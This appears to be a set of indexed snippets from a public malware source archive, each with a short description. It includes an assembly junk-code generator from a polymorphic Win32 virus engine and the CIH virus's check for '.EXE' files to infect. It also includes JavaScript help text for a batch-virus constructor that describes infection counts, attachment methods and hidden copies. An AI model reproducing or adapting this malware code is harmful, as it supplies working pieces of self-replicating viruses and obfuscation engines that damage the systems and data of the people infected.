-------------------------------- ### Memory Junk Generator - Immediate Operation (Assembly) Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt Generates an immediate operation on memory. This method is part of a larger memory junk generation routine and involves moving data with immediate values. ```assembly mj_meth1: push eax push OPTYPE_MOV + 3 call rnd32r cmp al, OPTYPE_MOV + 1 jb mj_m1_nmov mov al, OPTYPE_MOV j_m1_nmov: xchg eax, ebx call rnd32 xchg eax, edx call rnd32 test al, 0Ch jz mj_m1_nsx movsx edx, dl j_m1_nsx: pop eax j_m1_nrc: jmp ciOpRMImm ``` -------------------------------- ### Check for '.EXE' File Extension Source: https://github.com/vxunderground/malwaresourcecode/blob/main/MSDOS/C-Index/Virus.MSDOS.Unknown.cih.txt Compares the file name extension to '.EXE'. It uses a reversed comparison ('EXE.') due to the way the bytes are likely stored or compared. ```assembly ; ************************************* ; * Is FileName '.EXE' !? * ; ************************************* ; cmp [esi+eax-04h], '.EXE' cmp [esi+eax-04h], 'EXE.' pop esi jne DisableOnBusy ``` -------------------------------- ### Info Function for Batch Bug Maker Source: https://github.com/vxunderground/malwaresourcecode/blob/main/LegacyWindows/Win2k/Constructor.Script.IBBM.a.html Displays information about The Incredible Batch Bug Maker, explaining its parameters and functionality for creating replicating batch files. ```javascript function Info() { WinOpen(""); wr("

The Incredible Batch Bug Maker

"); wr("Makes DOS 6 compatible replicating batch files
"); wr("Produced March 27, 1996

"); wr("The Key String must be unique, the generated bug will not "); wr("touch any batch containing this string. The Sub String is "); wr("used in compound methods, it should also be unique. Infects "); wr("per run is how many batches will be assimilated with each run "); wr("of a bugged batch, if omitted all available batches are game. "); wr("Max seeks is the maximum number of infected files skipped "); wr("before giving up, if empty or NaN no limit checks are made. "); wr("The Add Code box is for adding batch code that will run when "); wr("all time and date conditions are satisfied, or every time if "); wr("no conditions are entered. The condition strings simply match "); wr("the output from the date and time commands. Three methods of "); wr("attachment are available: Appending simply tacks on the code, "); wr("Inserting places the bug before the host, and Compound which "); wr("uses a single inserted line then appends the rest. Compound "); wr("Immediate runs the bug first, Compound Delayed runs the bug when "); wr("the host completes. Search specifies the directories and order "); wr("for seeking batch files (watch out for path!). Find Host tells "); wr("it to generate code for seeking out the host batch even if run "); wr("from the path (not available on appenders), Use Copy keeps a "); wr("copy of the bug code in the root of C: (must be checked for "); wr("appenders), Hidden hides the root copy, Echo Blank places an "); wr("empty line between the host and any appended code to prevent "); wr("errors with batches that have no final return. Send to Window "); wr("opens a new browser window for the code to avoid trashing the "); wr("form. To copy code to clipboard uncheck it, good for one shot. "); wr("Resizing or reloading the for"); } ```